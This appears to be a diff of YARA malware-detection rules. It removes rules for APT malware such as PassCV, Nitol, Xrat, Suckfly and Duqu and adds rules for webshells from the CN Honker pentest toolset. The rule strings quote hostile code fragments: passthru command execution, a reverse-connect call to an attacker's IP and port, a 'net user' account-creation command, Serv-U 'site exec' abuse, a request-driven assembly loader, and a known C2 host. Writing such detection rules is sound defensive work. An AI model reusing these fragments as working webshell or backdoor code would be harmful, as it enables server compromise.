+		id = "115651d3-63e1-58e3-b27c-42271111bb91"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_passcv.yar#L107-L124"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L725-L740"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1032f41688e7cb3fe0be33b143c1af43ee705737a70af3b336ba8504ffe169a9"
-		score = 75
+		hash = "20da92b2075e6d96636f883dcdd3db4a38c01090"
+		logic_hash = "a24bf11a2728bb8d18ea005b057648770956694e0b257d4464ad15ee3e24eda2"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "28c7575b2368a9b58d0d1bf22257c4811bd3c212bd606afc7e65904041c29ce1"
 
 	strings:
-		$x1 = "NXKILL" fullword wide
-		$s1 = "2OLE32.DLL" fullword ascii
-		$s2 = "localspn.dll" fullword wide
-		$s3 = "!This is a Win32 program." fullword ascii
+		$s15 = "Const myCmdDotExeFile = \"command.com\"" fullword ascii
+		$s16 = "If LCase(appName) = \"cmd.exe\" And appArgs <> \"\" Then" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 8000KB and $x1 and 2 of ( $s* ) )
+		filesize < 406KB and all of them
 }
-rule SIGNATURE_BASE_Passcv_Sabre_Malware_4 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Php1 : FILE
 {
 	meta:
-		description = "PassCV Malware mentioned in Cylance Report"
+		description = "Webshell from CN Honker Pentest Toolset - file php1.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f182064d-3a91-5a61-aa0f-2ce491a60126"
-		date = "2016-10-20"
+		id = "5fe78cc6-8be3-595f-a082-e361259938e5"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_passcv.yar#L126-L141"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L742-L758"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c445e745ef520438fa7c4ddcae2657b57c80d798640fdd7c85eabf535f158911"
-		score = 75
+		hash = "c2f4b150f53c78777928921b3a985ec678bfae32"
+		logic_hash = "aadf47ac6231b41e720efdd85c481ebac8fccb572e57b86b27a95dd367c0d81b"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "27463bcb4301f0fdd95bc10bf67f9049e161a4e51425dac87949387c54c9167f"
 
 	strings:
-		$s1 = "QWNjZXB0On" fullword ascii
-		$s2 = "VXNlci1BZ2VudDogT" fullword ascii
-		$s3 = "dGFzay5kbnME3luLmN" fullword ascii
+		$s7 = "$sendbuf = \"site exec \".$_POST[\"SUCommand\"].\"\\r\\n\";" fullword ascii
+		$s8 = "elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$res = @ob_get_c" ascii
+		$s18 = "echo Exec_Run($perlpath.' /tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
+		filesize < 621KB and all of them
 }
-rule SIGNATURE_BASE_Passcv_Sabre_Tool_Ntscan : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Jspshell2 : FILE
 {
 	meta:
-		description = "PassCV Malware mentioned in Cylance Report"
+		description = "Webshell from CN Honker Pentest Toolset - file jspshell2.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6ec3371a-2a1c-53d1-b650-d28728db1b40"
-		date = "2016-10-20"
+		id = "ff72f94b-1c0a-5615-b35f-35f69c920292"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_passcv.yar#L143-L159"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L760-L775"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f2b41c1e6db8c9288663cccbf5659484ed415b403068cc566b31aa044bf0de9e"
-		score = 75
+		hash = "cc7bc1460416663012fc93d52e2078c0a277ff79"
+		logic_hash = "3a60991fa557655fbd2450739976ac612a0ea2a3df22873382b05438cac12762"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0f290612b26349a551a148304a0bd3b0d0651e9563425d7c362f30bd492d8665"
 
 	strings:
-		$x1 = "NTscan.EXE" fullword wide
-		$x2 = "NTscan Microsoft " fullword wide
-		$s1 = "admin$" fullword ascii
+		$s10 = "if (cmd == null) cmd = \"cmd.exe /c set\";" fullword ascii
+		$s11 = "if (program == null) program = \"cmd.exe /c net start > \"+SHELL_DIR+\"/Log.txt" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 2 of them )
+		filesize < 424KB and all of them
 }
-rule SIGNATURE_BASE_Passcv_Sabre_Malware_5 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Tuoku_Script_Mysql : FILE
 {
 	meta:
-		description = "PassCV Malware mentioned in Cylance Report"
+		description = "Webshell from CN Honker Pentest Toolset - file mysql.aspx"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ce8d1b9e-7750-5796-a048-20bfd48c6aee"
-		date = "2016-10-20"
+		id = "fa0627fb-a40c-5856-ae78-17d33910878f"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_passcv.yar#L161-L182"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L777-L791"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "30508c6561a2bb908945e9092da1d5cf2257b8b183effcea25a1ba15567f3d20"
-		score = 75
+		hash = "8e242c40aabba48687cfb135b51848af4f2d389d"
+		logic_hash = "bde2ea1ccfc88138456a1b255a32a7323f5ef0f677499db6dc6670987cc37585"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "03aafc5f468a84f7dd7d7d38f91ff17ef1ca044e5f5e8bbdfe589f5509b46ae5"
 
 	strings:
-		$x1 = "ncircTMPg" fullword ascii
-		$x2 = "~SHELL#" fullword ascii
-		$x3 = "N.adobe.xm" fullword ascii
-		$s1 = "NEL32.DLL" fullword ascii
-		$s2 = "BitLocker.exe" fullword wide
-		$s3 = "|xtplhd" fullword ascii
-		$s4 = "SERVICECORE" fullword wide
-		$s5 = "SHARECONTROL" fullword wide
+		$s1 = "txtpassword.Attributes.Add(\"onkeydown\", \"SubmitKeyClick('btnLogin');\");" fullword ascii
+		$s2 = "connString = string.Format(\"Host = {0}; UserName = {1}; Password = {2}; Databas" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 4000KB and 1 of ( $x* ) or all of ( $s* ) )
+		filesize < 202KB and all of them
 }
-rule SIGNATURE_BASE_Backdoor_Redosdru_Jun17 : HIGHVOL FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Php9 : FILE
 {
 	meta:
-		description = "Detects malware Redosdru - file systemHome.exe"
+		description = "Webshell from CN Honker Pentest Toolset - file php9.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ea038142-6903-5d08-ac89-70c1bbef716c"
-		date = "2017-06-04"
+		id = "c8cbee10-78ea-5a6f-9c80-7e51a9c38440"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/OOB3mH"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eternalblue_non_wannacry.yar#L12-L36"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L793-L807"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "99218c4decf98f02eb75c3c41a56f857a07779c68d30c4d16ca605052c4f9c3e"
-		score = 75
+		hash = "cd3962b1dba9f1b389212e38857568b69ca76725"
+		logic_hash = "bea117862ebc9220a4d9aee091c808274f9907fceb83b528055998ddcc90aa5f"
+		score = 70
 		quality = 85
-		tags = "HIGHVOL, FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4f49e17b457ef202ab0be905691ef2b2d2b0a086a7caddd1e70dd45e5ed3b309"
-
-	strings:
-		$x1 = "%s\\%d.gho" fullword ascii
-		$x2 = "%s\\nt%s.dll" fullword ascii
-		$x3 = "baijinUPdate" fullword ascii
-		$s1 = "RegQueryValueEx(Svchost\\netsvcs)" fullword ascii
-		$s2 = "serviceone" fullword ascii
-		$s3 = "\x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#f \x1f#" fullword ascii
-		$s4 = "servicetwo" fullword ascii
-		$s5 = "UpdateCrc" fullword ascii
-		$s6 = "\x1f#[ \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#x \x1f#" fullword ascii
-		$s7 = "nwsaPAgEnT" fullword ascii
-		$s8 = "%-24s %-15s 0x%x(%d) " fullword ascii
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s1 = "Str[17] = \"select shell('c:\\windows\\system32\\cmd.exe /c net user b4che10r ab" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 700KB and 1 of ( $x* ) or 4 of them )
+		filesize < 1087KB and all of them
 }
-rule SIGNATURE_BASE_Backdoor_Nitol_Jun17 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Portrecall_Jsp : FILE
 {
 	meta:
-		description = "Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader"
+		description = "Webshell from CN Honker Pentest Toolset - file jsp.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7dd26868-59e0-51a1-b12a-3b69d6246ff5"
-		date = "2017-06-04"
-		modified = "2023-01-07"
-		reference = "https://goo.gl/OOB3mH"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eternalblue_non_wannacry.yar#L38-L61"
+		id = "cd34cb47-c5e0-5094-a501-6a8a00d94018"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L809-L823"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9035b8bd74c284f170f8c9767d96580dba243786abaa3b2e79e05a981f8fa204"
-		score = 75
+		hash = "65e8e4d13ad257c820cad12eef853c6d0134fce8"
+		logic_hash = "98f279c3e50308f67f88ecf8459943187ea152664fe0206c4a7d3435242df2a6"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "cba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)" fullword ascii
-		$x2 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)" fullword ascii
-		$x3 = "TCPConnectFloodThread.target = %s" fullword ascii
-		$s1 = "\\Program Files\\Internet Explorer\\iexplore.exe" ascii
-		$s2 = "%c%c%c%c%c%c.exe" fullword ascii
-		$s3 = "GET %s%s HTTP/1.1" fullword ascii
-		$s4 = "CCAttack.target = %s" fullword ascii
-		$s5 = "Accept-Language: zh-cn" fullword ascii
-		$s6 = "jdfwkey" fullword ascii
-		$s7 = "hackqz.f3322.org:8880" fullword ascii
+		$s0 = "lcx.jsp?localIP=202.91.246.59&localPort=88&remoteIP=218.232.111.187&remotePort=2" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or 5 of ( $s* ) ) ) or ( all of them )
+		filesize < 1KB and all of them
 }
-rule SIGNATURE_BASE_Xrat_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_ASPX_Aspx3 : FILE
 {
 	meta:
-		description = "Detects Patchwork malware"
+		description = "Webshell from CN Honker Pentest Toolset - file aspx3.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "170c926a-2020-5269-85b8-6fe9ad28ef76"
-		date = "2017-12-11"
+		id = "4f835136-744a-5324-a1f4-02d1cfa2cab6"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/Pg3P4W"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_xrat.yar#L12-L41"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L825-L840"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "032c5af4f34959783102977543d2caf6199b8d1880a64797882f591e36c64d69"
-		score = 75
+		hash = "dd61481771f67d9593214e605e63b62d5400c72f"
+		logic_hash = "11bf511ee70ff4bde0a9320cb80dd9efa0f437d432c78a859153cfcc8e80db01"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b"
-		hash2 = "f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a"
 
 	strings:
-		$x1 = "\" -CHECK & PING -n 2 127.0.0.1 & EXIT" fullword wide
-		$x2 = "xClient.Core.Elevation" fullword ascii
-		$x3 = ">> Welcome to MAX-Shell :Session created" fullword wide
-		$x4 = "xClient.Properties.Resources.resources" fullword ascii
-		$x5 = "<description>My UAC Compatible application</description>" fullword ascii
-		$s1 = "ping -n 20 localhost > nul" fullword wide
-		$s2 = "DownloadAndExecute" fullword ascii
-		$s3 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36" fullword wide
-		$s4 = "Client.exe" fullword ascii
-		$s5 = "Microsoft -Defender" fullword wide
-		$s6 = "Microsoft- Defender" fullword wide
-		$s7 = "set_RunHidden" fullword ascii
+		$s0 = "Process p1 = Process.Start(\"\\\"\" + txtRarPath.Value + \"\\\"\", \" a -y -k -m" ascii
+		$s12 = "if (_Debug) System.Console.WriteLine(\"\\ninserting filename into CDS:" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or 3 of them )
+		filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_FVEY_Shadowbrokers_Jan17_Screen_Strings : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_ASPX_Shell_Shell : FILE
 {
 	meta:
-		description = "Detects strings derived from the ShadowBroker's leak of Windows tools/exploits"
+		description = "Webshell from CN Honker Pentest Toolset - file shell.aspx"
 		author = "Florian Roth (Nextron Systems)"
-		id = "59832d0a-0cb2-5eb9-a4e2-36aaa09a3998"
-		date = "2017-01-08"
+		id = "8fbcae22-07b7-5afe-9f15-06e2f426b5ca"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message7/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fvey_shadowbroker_jan17.yar#L10-L47"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L842-L857"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8015b227c5df68fffadb86b72843b2b831d5603978ada3f50cc535a870aa94eb"
-		score = 75
+		hash = "1816006827d16ed73cefdd2f11bd4c47c8af43e4"
+		logic_hash = "ac22d89353b4316289bf6c6e13332ac401f4b57f6c29b71861cb48359c1e55f9"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "Danderspritz" ascii wide fullword
-		$x2 = "DanderSpritz" ascii wide fullword
-		$x3 = "PeddleCheap" ascii wide fullword
-		$x4 = "ChimneyPool Addres" ascii wide fullword
-		$a1 = "Getting remote time" fullword ascii
-		$a2 = "RETRIEVED" fullword ascii
-		$b1 = "Added Ops library to Python search path" fullword ascii
-		$b2 = "target: z0.0.0.1" fullword ascii
-		$c1 = "Psp_Avoidance" fullword ascii
-		$c2 = "PasswordDump" fullword ascii
-		$c4 = "EventLogEdit" fullword ascii
-		$d1 = "Mcl_NtElevation" fullword ascii wide
-		$d2 = "Mcl_NtNativeApi" fullword ascii wide
-		$d3 = "Mcl_ThreatInject" fullword ascii wide
-		$d4 = "Mcl_NtMemory" fullword ascii wide
+		$s0 = "<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cook" ascii
+		$s1 = "<%@ Page Language=\"C#\" ValidateRequest=\"false\" %>" fullword ascii
 
 	condition:
-		filesize < 2000KB and ( 1 of ( $x* ) or all of ( $a* ) or 1 of ( $b* ) or ( uint16( 0 ) == 0x5a4d and 1 of ( $c* ) ) or 3 of ( $c* ) or ( uint16( 0 ) == 0x5a4d and 3 of ( $d* ) ) )
+		filesize < 1KB and all of them
 }
-rule SIGNATURE_BASE_Suckfly_Nidiran_Gen_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell__Php1_Php7_Php9 : FILE
 {
 	meta:
-		description = "Detects Suckfly Nidiran Trojan"
+		description = "Webshell from CN Honker Pentest Toolset - from files php1.txt, php7.txt, php9.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1abc596a-5fb1-55f9-b72d-022bfc6d10c7"
-		date = "2018-01-28"
+		id = "cfc2f624-976f-5ff6-bd07-10948b9290bc"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_suckfly.yar#L14-L29"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L859-L878"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "bf617259df00b16272caffa8f1ffcf8d29cb98cb6ab85ca52e0bb0706f0cd5b0"
-		score = 75
+		logic_hash = "6ea5b362f8d8f2e99725d4dd4d2ada5c3939a45a3dde0084571600452ab4673c"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ac7d7c676f58ebfa5def9b84553f00f283c61e4a310459178ea9e7164004e734"
+		super_rule = 1
+		hash0 = "c2f4b150f53c78777928921b3a985ec678bfae32"
+		hash1 = "05a3f93dbb6c3705fd5151b6ffb64b53bc555575"
+		hash2 = "cd3962b1dba9f1b389212e38857568b69ca76725"
 
 	strings:
-		$s1 = "WriteProcessMemory fail at %d " fullword ascii
-		$s2 = "CreateRemoteThread fail at %d " fullword ascii
-		$s3 = "CreateRemoteThread Succ" fullword ascii
+		$s1 = "<a href=\"?s=h&o=wscript\">[WScript.shell]</a> " fullword ascii
+		$s2 = "document.getElementById('cmd').value = Str[i];" fullword ascii
+		$s3 = "Str[7] = \"copy c:\\\\\\\\1.php d:\\\\\\\\2.php\";" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them
+		filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_Suckfly_Nidiran_Gen_2 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell__Serv_U_By_Goldsun_Asp3_Serv_U_Asp : FILE
 {
 	meta:
-		description = "Detects Suckfly Nidiran Trojan"
+		description = "Webshell from CN Honker Pentest Toolset - from files Serv-U_by_Goldsun.asp, asp3.txt, Serv-U asp.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b090079d-1c22-5931-a25b-e960343a610f"
-		date = "2018-01-28"
+		id = "e91e05e8-0f6d-57a7-a649-a834733f17c8"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_suckfly.yar#L31-L59"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L880-L899"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2e4f6a920e063113a9ff252869e1c2ebdf5a2495b4adb1edaf9500904234f362"
-		score = 75
+		logic_hash = "b733e80f234a85a4f65eedd94f535860b4da464adb80a91afc547a8d96b5dc7a"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b53a316a03b46758cb128e5045dab2717cb36e7b5eb1863ce2524d4f69bc2cab"
-		hash2 = "eaee2bf83cf90d35dab8a4711f7a5f2ebf9741007668f3746995f4564046fbdf"
+		super_rule = 1
+		hash0 = "d4d7a632af65a961a1dbd0cff80d5a5c2b397e8c"
+		hash1 = "87c5a76989bf08da5562e0b75c196dcb3087a27b"
+		hash2 = "cee91cd462a459d31a95ac08fe80c70d2f9c1611"
 
 	strings:
-		$x1 = "WorkDll.dll" fullword ascii
-		$x2 = "%userprofile%\\Security Center\\secriter.dll" fullword ascii
-		$s1 = "DLL_PROCESS_ATTACH is called" fullword ascii
-		$s2 = "Support Security Accounts Manager For Microsoft Windows.If this service is stopped, any services that depended on it will fail t" ascii
-		$s3 = "before CreateRemoteThread" fullword ascii
-		$s4 = "CreateRemoteThread Succ" fullword ascii
-		$s5 = "Microsoft Security Accounts Manager" fullword ascii
-		$s6 = "DoRunRemote" fullword ascii
-		$s7 = "AutoRunFun" fullword ascii
-		$s8 = "ServiceMain is called" fullword ascii
-		$s9 = "DllRegisterServer is called" fullword ascii
+		$s1 = "c.send loginuser & loginpass & mt & deldomain & quit" fullword ascii
+		$s2 = "loginpass = \"Pass \" & pass & vbCrLf" fullword ascii
+		$s3 = "b.send \"User go\" & vbCrLf & \"pass od\" & vbCrLf & \"site exec \" & cmd & vbCr" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or 4 of them )
+		filesize < 444KB and all of them
 }
-
-rule SIGNATURE_BASE_Suckfly_Nidiran_Gen_3 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell__Asp4_Asp4_MSSQL__MSSQL_ : FILE
 {
 	meta:
-		description = "Detects Suckfly Nidiran Trojan"
+		description = "Webshell from CN Honker Pentest Toolset - from files asp4.txt, asp4.txt, MSSQL_.asp, MSSQL_.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d9daf7e4-2cfa-50c9-84d2-c971734abe5e"
-		date = "2018-01-28"
+		id = "e0070f0d-35d0-5024-88e7-e0e04b29f485"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_suckfly.yar#L61-L88"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L901-L921"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4fddb55999bbbeecd92863219e878c840640e4d17008cb789a255528ef3fac9c"
-		score = 75
+		logic_hash = "a8ec5ad87c83c16f47391c3ce08cee74c6be1e42c288eec6d1559867d28489c6"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c2022e1114b162e79e44d974fd310d53e1bbdd8cb4f217553c1227cafed78855"
-		hash2 = "47731c9d985ebc2bd7227fced3cc44c6d72e29b52f76fccbdaddd76cc3450706"
+		super_rule = 1
+		hash0 = "4005b83ced1c032dc657283341617c410bc007b8"
+		hash1 = "4005b83ced1c032dc657283341617c410bc007b8"
+		hash2 = "7097c21f92306983add3b5b29a517204cd6cd819"
+		hash3 = "7097c21f92306983add3b5b29a517204cd6cd819"
 
 	strings:
-		$x1 = "RUN SHELLCODE FAIL" fullword ascii
-		$x2 = "RUN PROCESS FAILD!" fullword ascii
-		$x3 = "DOWNLOAD FILE FAILD" fullword ascii
-		$x4 = "MODIFYCONFIG FAIL!" fullword ascii
-		$x5 = "GetFileAttributes FILE FAILD" fullword ascii
-		$x6 = "MODIFYCONFIG SUCC!" fullword ascii
-		$s1 = "cmd.exe /c %s" fullword ascii
-		$s2 = "error to create pipe!" fullword ascii
-		$s3 = "%s\\%08x.exe" fullword ascii
+		$s0 = "\"<form name=\"\"searchfileform\"\" action=\"\"?action=searchfile\"\" method=\"" ascii
+		$s1 = "\"<TD ALIGN=\"\"Left\"\" colspan=\"\"5\"\">[\"& DbName & \"]" fullword ascii
+		$s2 = "Set Conn = Nothing " fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "ae0f4ebf7e8ce91d6548318a3cf82b7a" or 1 of ( $x* ) or 2 of them )
+		filesize < 341KB and all of them
 }
-rule SIGNATURE_BASE_APT_Apt_Duqu2_Loaders : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell__Injection_Jmcook_Jmpost_Manualinjection : FILE
 {
 	meta:
-		description = "Rule to detect Duqu 2.0 samples"
-		author = "Kaspersky Lab"
-		id = "22db52c2-18e7-537e-a9c5-38ccfd3a0d30"
-		date = "2015-06-09"
+		description = "Webshell from CN Honker Pentest Toolset - from files Injection.exe, jmCook.asp, jmPost.asp, ManualInjection.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e154ecb5-9d56-520a-b76a-635a8864f0a8"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_kaspersky_duqu2.yar#L10-L38"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L923-L942"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "79f205745e61b55c43c239d9da9086fd72312ea2741351183d32f7c227174ff8"
-		score = 75
-		quality = 83
